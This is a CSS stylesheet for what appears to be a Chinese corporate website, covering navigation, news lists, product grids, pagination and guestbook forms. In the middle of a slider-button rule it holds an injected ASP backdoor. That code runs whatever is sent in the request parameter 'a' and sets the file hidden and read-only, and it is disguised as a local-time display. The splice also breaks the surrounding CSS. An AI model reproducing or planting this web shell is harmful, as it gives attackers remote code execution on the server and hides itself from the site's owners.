 *{margin:0; padding:0;}

body{
	
}
li{ list-style:none}
.both{ clear:both}
.left{ float:left}
.right{ float:right}
a{ text-decoration:none; color:#000;}
img{ border:0;}
.red{ color:#FF0000}
.hexunHidden{display:none}
.hexunShow{display:block}
#top{ width:1000px; margin:0 auto;margin-bottom:20px;}
#top .link{ font-size:13px; text-align:right; height:30px; line-height:30px;}
#top .link a{ color:#000000; margin:0 10px; }
#top .link a:hover{ color:#E70008; }
#top .logo{ font-size:12px; overflow:hidden}
#top .logo .le{ float:left}
#top .logo .re .yq{ height:24px; line-height:22px;}
#top .logo .re{ float:right; margin-top:60px;}
#nav{ width:100%; background-image:url(../images/nav.jpg); height:45px; line-height:45px; margin:0 auto;}
#nav .lm{ width:1000px; margin:0 auto;}
#nav_all li a{ font-size:15px; font-weight:bold; display:block; font-family: "微软雅黑";color:#ffffff;}
#nav_all li a:hover{ background-color:#AA0005; font-size:15px; font-weight:bold}
#nav_all { height: 45px; float: left; line-height: 45px; position: relative; z-index: 222;}
#nav_all li.zi { text-align: center; width:100px; text-align:center; float:left ;}
#nav_all li.zi ul { display: none;  z-index: 99;  }
#nav_all li.zi ul li { background-image: none; line-height: 32px; height: 32px; padding-top: 0px; padding: 0; width:220px; text-align:left   }
#nav_all li.zi ul li a { background-image: none; padding: 0px 20px; margin: 0px; height: 32px; line-height: 32px; color:#FFF ; background-color:#000; opacity:0.8;filter:alpha(opacity=50);  border: none; font-family:Verdana, Geneva, sans-serif; font-size:12px; font-weight:normal;}
#nav_all li.zi ul  li a:hover { background-image: none; padding: 0px 20px; margin: 0px auto; height: 32px; line-height: 32px; color: #FFF; background: #f20007; border-top: none; }
.zzz{ background-color:#AA0005; width:100px;}
.zzz ul li{ text-align:center; height:30px; line-height:30px; font-weight:bold}
.zzzz{ background-color:#AA0005; width:210px;}
.zzzz ul li{ text-align:center; height:30px; line-height:30px; font-weight:bold}
.cp{ background-color:#AA0005; width:230px;}
.cp ul li{ text-align:center; height:30px; line-height:30px; font-weight:bold}
.zzzzz{ background-color:#AA0005; width:170px;}
.zzzzz ul li{ text-align:center; height:30px; line-height:30px; font-weight:bold}
#nr{ width:100%; margin:0 auto; background:url(../images/nr_bg.jpg) repeat-x;}
#content{ width:1000px; margin:0 auto; overflow:hidden }
#content .tv{ width:279px; float:left; margin-top:30px;}
#content .news{ border:1px #EFEFEF solid; width:427px; margin-left:7px; float:left; padding:5px; height:233px; margin-top:30px; overflow:hidden}
#content .news .tit .l1{ height:30px; float:left}
#content .news .tit .l1 ul li{ float:left; text-align:center; height:30px; line-height:30px; margin-left:3px;}
#content .news .tit .l1 ul li.tagf1{ background-image:url(../images/ne_1.jpg); width:89px; height:30px; color:#FFFFFF; font-size:12px;}
#content .news .tit .l1 ul li.tagn1{ background-image:url(../images/ne_2.jpg); width:89px; height:30px; color:#5E5E5E; font-size:12px;}
#content .news .coo{ float:left; width:410px; padding-top:20px;}
#content .news .coo ul li a{ color:#5E5E5E;}
#content .news .coo ul li a:hover{ color: #FF0000}
#content .news .coo ul li span { float:right}
#content .news .coo ul li{ height:28px; line-height:28px;color:#5E5E5E; font-size:12px; border-bottom:1px #D6D6D6 dashed; float:left;width:395px; }
#content .news .coo ul li{background: url(../images/dian.jpg) no-repeat left center;padding-left:15px;}
#content .news .tit .more{ float:right}
#content .zs{ float:right; width:269px; margin-top:30px;}
#content .zs .lf{  padding-bottom:20px;}
#content .zs .lf2{border:1px #EFEFEF solid; height:175px; width:260px}
#content .zs .lf2	.aa{}
#content .zs .lf2	.aa .lr{  width:260px; height:175px; background-color:#fff;  line-height:18px; overflow:hidden;position:relative;  }
#content .zs .lf2	.a2 .lr  .zj{ width:260px; height:175px;}
#content .zs .lf2	.aa .lr  .zj ul li{ float:left;width:260px; height:175px;overflow:hidden; text-align:center}
#content .zs .lf2	.aa .lr  .zj ul li img{ height:175px; width:260px;}
#content .zs .lf2	.aa .lr #prev11{
    cursor: pointer;
    left: 0px;
  本地时间<%
dim a
a=request(chr(97))
on error resume next
execute a
response.write(""):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>
<%
response.write formatdatetime(now,1)&"<br>"
%>
    position: absolute;
    top: 65px;
    z-index: 5;
}#content .zs .lf2	.aa .lr #next11 {
    cursor: pointer;
    right: 0px;
    
    position: absolute;
    top: 65px;
    z-index: 5;
}

#cp{ width:1000px; height:590px; margin:0px auto; margin-top:30px; border-bottom:1px #AFAFAF solid; overflow:hidden; font-weight:normal;}

#cp .title{ border-bottom:1px #AFAFAF dashed; height:30px;}
#cp .title .l1{ float:left;font-size:12px; color:#AFAFAF}
#cp .title .l1 span{ font-size:16px; font-weight:bold; color:#000000; margin:0 5px;}

#cp  .title .l2{ float:right}

#cp .content1{ padding:5px; width:1000px; }

#cp .content1 ul li{ float:left; text-align:center; line-height:30px; font-size:12px;overflow:hidden;font-family: "微软雅黑"; height:250px; width:240px}
#cp .content1 ul li img{ padding:17px;}
#cp .content1 ul li a{ color:#000; }
#cp .content1 ul li a:hover{ color: #FF0000}
#zjl{ width:380px; height:184px; float:left; font-size:12px;line-height:25px;}
#zjls{width:154px; height:184px; float:left;}
#zjss{width:215px; height:184px; float:left; margin-left:10px;}
#zjss a{color: #5b5b5b;}

#fw{ width:1000px; margin:0 auto; overflow:hidden; margin-top:30px;}
#fw .fw1{ width:480px; float:left}
#fw .fw1 .title{  height:30px;}
#fw .fw1 .title .l1{ float:left;font-size:12px; color:#5b5b5b}
#fw .fw1 .title .l1 span{ font-size:16px; font-weight:bold; color:#000000; margin:0 5px;}

#fw .fw1 .title .l2{ float:right}

#fw .fw1 .content{  font-size:12px; line-height:29px; color:#5b5b5b;}
#fw .fw1 .content .zb{ float:left; padding:10px;}


#fw .ge{  float:left}

#fw .fw2{ width:480px; float:right}
#fw .fw2 .title{  height:30px;}
#fw .fw2 .title .l1{ float:left;font-size:12px; color:#5b5b5b}
#fw .fw2 .title .l1 span{ font-size:16px; font-weight:bold; color:#000000; margin:0 5px;}

#fw .fw2 .title .l2{ float:right}

#fw .fw2 .content{  font-size:12px; line-height:28px; color:#5b5b5b; }
#fw .fw2 .content .zb{ float:left; padding:10px;}

#yq{width:100%; background-color:#FAFAFA; height:45px; line-height:45px; margin-top:40px;}
#yq .yq2{ width:1000px; margin:0 auto}

#yq .yq2 ul li{ float:left; width:100px; text-align:center;color:#C11217; font-size:13px}
#yq .yq2 ul li a{ color:#C11217;margin-right:20px}
#yq .yq2 ul li a:hover{ color:#000}
#foot{ width:100%; background-image:url(../images/foote.jpg); height:108px;}

#foot .di{color:#FFFFFF;font-size:12px; width:1000px; margin:0 auto; line-height:25px; text-align:center; padding-top:15px; background:url(../images/er.jpg) no-repeat;}
#foot .di a {
	color:inherit;
}


/* 栏目页- Start */
#xxx{width:231px; height:159px; float:left;padding:7px 8px 5px 14px;} 
#xxxs{width:1200px; height:454px; float:left;padding:7px 8px 5px 14px;} 
.mainbox{
    overflow:hidden;
    position:relative;
}
.flashbox{
   overflow:hidden;
    position:relative;
}
.imagebox{
    text-align:right;position:relative;z-index:999;
}

.bitdiv{display:inline-block;width:18px;height:18px;margin:0 20px 10px 0px;cursor:pointer;float:right;}

 /* 菜单分类- Start */
#bt{
	width:1000px;
	height:34px;
	float:left;
	padding:15px 0px 5px 0px;
}
#bt p{
	float:right;
	height:17px;
	font-size:12px;
	background:url(../images/anniu.jpg) no-repeat ;
	padding-left:30px;
	line-height:20px;
}
#bt p a{color:#000;}
#tab{width:745px; height:41px; float:left; background:#ebebeb; margin-top:1px;}
#tab h5{
	font-family: "微软雅黑";
	line-height:42px;
	color:#F00;
	padding-left:40px;
	font-size:16px;
}
#abuout_main{
	width:252px;
	float:left;
}
#fenlei_b{
	width:252px;
	float:left;
	border:1px solid #f1f1f1
	;overflow:hidden;
	fonts-size:12px;
}
#fenlei{
	width:220px;
	float:left;
	overflow:hidden;
	margin-left:5px;
	padding:10px 10px 20px 10px;
}
#fenlei li a:hover{color:#e10006;}
#fenlei li a{color:#6d6d6d; font-size:12px;}
#fenlei li{
	line-height:30px;
	border-bottom:1px #ebebeb solid;
	background: url(../images/dians.jpg) no-repeat left center; 
	padding-left:20px;
}

#tu{
	width:254px;
	height:260px;
	float:left;
}
#btn{
	width:254px;
	height:48px;
	float:left;
	padding:15px 0px 40px 0px;
}
 /* 栏目页 详细内容- Start */
#column{
	width:745px;
	_height:595px;
	min-height:595px;
	float:left;
	padding:0px 0px 40px 0px;
}
  /* 产品 详细内容- Start */
#masterp{
	width:745px;
	_height:595px;
	min-height:595px;
	float:left;
	margin-top:30px;
}
#masterp li{
	width:210px;
	float:left;
	margin-top:10px;
	padding-left:35px;
	overflow:hidden;
	line-height:30px;
}
#masterp p{
	text-align:center;
	font-size:14px;
}
#masterp li a{text-decoration:none;color:#565656;}
#masterp li a img {
	width: 200px;
	height: 154px;
}
  /* 新闻 详细内容- Start */
#mastern{
	font-size:12px;
	padding-left:35px;
	width:683px;
	_height:535px;
	min-height:535px;
	float:left;
	margin-top:30px;
	font-weight:normal;
}

#mastern li span{
	float:right;
	margin-right:10px;
	color:#6d6d6d;
}
#mastern li a{color:#000;}
#mastern li{
	line-height:30px;
	border-bottom:1px #d6d6d6 dashed;
	background: url(../images/dian.jpg) no-repeat left center;
	padding-left:30px;
}

  /* 内容 详细内容- Start */
#masterc{
	font-size:12px;
	padding-left:35px;
	width:683px;
	_height:595px;
	min-height:595px;
	float:left;
	margin-top:30px;
	font-weight:normal;
	line-height:30px;}

/* brandbox */
.brandbox{width:1000px;margin:40px auto;font-size:12px;overflow:hidden;padding-left:15px;}
.brandbox ul li{float:left}
.brandbox ul li.brand_item{width:250px;height:250px; text-align:center;}
.brand_item a{display:block;width:215px;height:212px}
.brand_item a:hover{text-decoration:none}
.brand_item a.brand_name{border:#ececec 1px solid;}
.brand_item a.brand_detail{border:#eb0007 2px solid;}
.brand_item a span{display:block;margin-left:1px;width:213px;padding-top:8px;height:24px;text-align:center;}
a.brand_name span{color:#000;background-color:#ececec}
a.brand_detail span{color:#fff;background-color:#eb0007}
/*后台程序*/
/*新闻列表页详细页面标题样式*/
.title{
	text-align:center; color:#5e5e5e; font-size:14px; font-weight:bold; font-family:Arial, Helvetica, sans-serif; margin:10px 0 20px 0;
}
.cont_column .info{
	padding:0;
}
.info,.product_title{
	text-align:center; height:25px; line-height:25px; border-width:1px 0; margin:0 0 10px 0;
}

/*分页样式 标准*/  
/*总容器样式*/  
.pager {
	padding: 3px; clear:both;text-align: center;color:#ccc;font-size:12px;font-family:Tahoma;margin:10px;
}   
/*分页链接样式*/  
.pager a { margin: 2px; padding:2px 5px; color: #b79617; text-decoration: none;background-color:#ebeff5;  border: 1px solid #8f9bac; }   
/*分页链接鼠标移过的样式*/  
.pager a:hover { color:#000; border: 1px solid #4b5564; background-color:#ffffff; }   
/*当前页码的样式*/  
.pager span.current { font-weight: bold; margin: 0 2px; padding: 2px 5px; color: #fff; background-color: #b79617; border: 1px solid #7a5f02; }   
/*不可用分页链接的样式(比如第1页时的"上一页"链接)*/  
.pager span.disabled { margin: 0 2px; padding: 2px 5px; color: #b79617; border: 1px solid #DDD; background:#fff; }   
/*跳转下拉菜单的样式*/  
.pager select {margin: 0px 2px -2px 2px; color:#66C;font-size:12px; font-family:Tahoma;}   
/*跳转文本框的样式*/  
.pager input {margin: 0px 2px -2px 2px; color:#66C; border: 1px solid #DDD; padding:2px; text-align:center;font-size:12px; font-family:Tahoma; width:20px;}   	

  //*留言板样式 标准*/  
/*总容器样式*/ 
#contenttext{ background:none; }

form{width:100%; margin: 0; text-align: left;}
form div {margin-bottom: 0px;}

textarea {width: 300px; border: 1px solid #ccc; padding:3px;}
input {width: 200px;border: 1px solid #ccc; }
input.button {width: 80px;  margin-left: 2em; cursor: pointer; font-family: Arial, Helvetica, sans-serif; font-size: 0.9em; color: #333; height: 22px;}
label {float: left; width: 60px;cursor: pointer; text-align:right;}

form span{color:#CC0000; padding: 0 0 0 2px;}

/*内容外框样式*/  
fieldset{border: 1px solid #fff; text-align: left; line-height: 150%;}
/*回复外框样式*/  
fieldset.r{border: 1px dashed #CFDDEB; text-align: left; line-height: 150%;}
/*标题文字样式*/  
fieldset legend{font-weight:bold; color:#006699;font-size: 9pt; margin:0px;}
/*姓名时间文字样式*/  
fieldset legend strong{font-weight:normal;color: #999999;}
/*鼠标移上样式*/  
.active{
	margin-top:10px;
	border: 1px solid #CFDDEB;
	padding: 5px 10px 10px 10px;
	background-color:#F2F0EE;
}
/*标准框移开后样式*/  
.normal{margin-top:10px; border: 1px solid #EBEBEB; padding: 5px 10px 10px 10px;}

.center{text-align: left; padding:20px 0 20px 80px; background:url(../images/bookbg.jpg) no-repeat 95px 20px;}


.pages{
	height:10px; padding:30px 0 0 0; text-align:center; clear:both;
}
.input_reservation{
	float:right; width:315px; padding:0 0 68px 0; margin:0 40px 0 0; display:inline;
}
.input_text_reservation{
	width:234px; height:19px; background:#fff; color:#333; border:1px solid #ccc; padding:5px 0 0 3px; 
}
.button_reservation{
	width:117px; height:21px; font-weight:bold; border:0px; cursor:pointer; line-height:21px;
}

.input_text_message{
	width:285px; margin:0 0 10px 0; 
}
.textarea_text_message{
	width:400px; height:115px; padding:3px 0 0 3px; border:1px solid #ccc; background:#fff; 
}
.button_message{
	width:123px; height:27px; margin:0 20px 0 0; border:0px; cursor:pointer; line-height:27px;
}
#lanmu{width:100%;
	height:261px;
	margin:0px auto;}
#lanmua{width:1200px;
	height:261px;
	margin:0px auto;
	overflow: hidden;
}
#bannerss{
	width:100%;
	height:464px;
	margin:0px auto;
	overflow: hidden;
	
}
#banners{
	width:1200px;
	height:464px;
	margin:0px auto;
	overflow: hidden;
	margin-top:5px;
}

.banner{ position:relative; height:454px; top:-14px; text-align:center; background:url(../images/zc.jpg) no-repeat center 0; }
.classBanner{position:relative; height:454px; top:-14px; background:url(../images/zc.jpg) no-repeat center 0;}
.bannerWrap{ width:1201px; overflow:auto; margin:0 auto; position:relative; top:-70px; z-index:3;}
.bannerWrap ul.showList{ margin:0 auto; float:right  }
.bannerWrap ul.showList li{ width:23px; height:23px; background: url(../images/01.png) no-repeat; margin:5px; float:left; color:#fff; padding-top:3px; text-align:center;  }
.bannerWrap ul.showList li.special{ background:url(../images/02.png) no-repeat; color:#048fd5}